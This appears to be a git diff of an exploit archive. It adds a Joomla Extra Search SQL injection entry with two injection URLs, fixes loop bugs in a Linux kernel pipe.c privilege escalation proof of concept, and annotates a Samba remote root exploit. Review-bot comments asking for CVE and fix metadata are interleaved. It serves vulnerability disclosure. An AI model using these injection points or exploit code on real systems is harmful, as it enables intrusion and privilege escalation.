diff --git a/files.csv b/files.csv
index fc43c2c54..16ef162cc 100644
--- a/files.csv
+++ b/files.csv
@@ -37573,3 +37573,4 @@ id,file,description,date,author,platform,type,port
 41642,platforms/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' Parameter SQL Injection",2017-03-20,"Ihsan Sencan",php,webapps,0
 41644,platforms/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",php,webapps,80
 41662,platforms/hardware/webapps/41662.py,"D-Link DGS-1510 - Multiple Vulnerabilities",2017-03-20,"Varang Amin",hardware,webapps,0
+41663,platforms/php/webapps/41663.txt,"Joomla! Component Extra Search 2.2.8 - 'establename' Parameter SQL Injection",2017-03-21,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/linux/local/9844.py b/platforms/linux/local/9844.py
index ef499aefe..efce5b4ac 100755
--- a/platforms/linux/local/9844.py
+++ b/platforms/linux/local/9844.py
@@ -2,11 +2,15 @@
 # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
 # PoC by Matthew Bergin
 # Bugtraq ID: 36901
+#
+# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/82/files
 import os
 import time
 import random
 #infinite loop
+i = 0
+x = 0
 while (i == 0):
 os.system("sleep 1")
 while (x == 0):
@@ -14,7 +18,7 @@ while (i == 0):
 pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
 if (pid == 0): #need an active pid, race condition applies
 print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
- return
+ break
 else:
 print "[+] PID: " + pid
 loc = "echo n > /proc/" + pid + "/fd/1"
diff --git a/platforms/php/webapps/41663.txt b/platforms/php/webapps/41663.txt
new file mode 100755
index 000000000..d22ee72cf
--- /dev/null
+++ b/platforms/php/webapps/41663.txt
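Review bot: In platforms/linux/local/9844.py the header still identifies the bug only as Bugtraq ID 36901, and the added E-DB note links a pull request rather than saying what was affected or fixed, so a reader cannot map this entry to patch status from the file itself. I would add `# CVE: <CVE-ID>` and `# Affected: <kernel versions, per vendor advisory>` under the Bugtraq line. Line 1 of the file is outside the hunk, so this assumes it holds no such metadata.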
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Joomla! Component Extra Search v2.2.8 - SQL Injection
+# Google Dork: N/A
+# Date: 21.03.2017
+# Vendor Homepage: http://www.joomlaboat.com/
+# Software: http://www.joomlaboat.com/extra-search
+# Demo: http://www.joomlaboat.com/
+# Version: 2.2.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# #ihsansencan
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_extrasearch&view=details&listing_id=1&establename=[SQL]
+# http://localhost/[PATH]/index.php?option=com_extrasearch&controller=createusers&establename=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/unix/remote/22469.c b/platforms/unix/remote/22469.c
index e136a95fa..0c3a663ec 100755
--- a/platforms/unix/remote/22469.c
+++ b/platforms/unix/remote/22469.c
@@ -6,6 +6,8 @@ A buffer overflow vulnerability has been reported for Samba. The problem occurs Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process. It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. + +E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/78/files */ /* 0x333hate => samba 2.2.x remote root exploit
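Review bot: The new entry platforms/php/webapps/41663.txt names the affected parameter (`establename` on the `details` view and the `createusers` controller of `com_extrasearch`) but gives no fixed release or mitigation, so it is unclear whether anything after 2.2.8 is safe. A closing line such as `# Fix: <fixed version, or "none at publication">` would answer that. Judging by its name only, `establename` may carry a table identifier into the query; if so, bound parameters cannot cover it and the component would need an allow-list of table names.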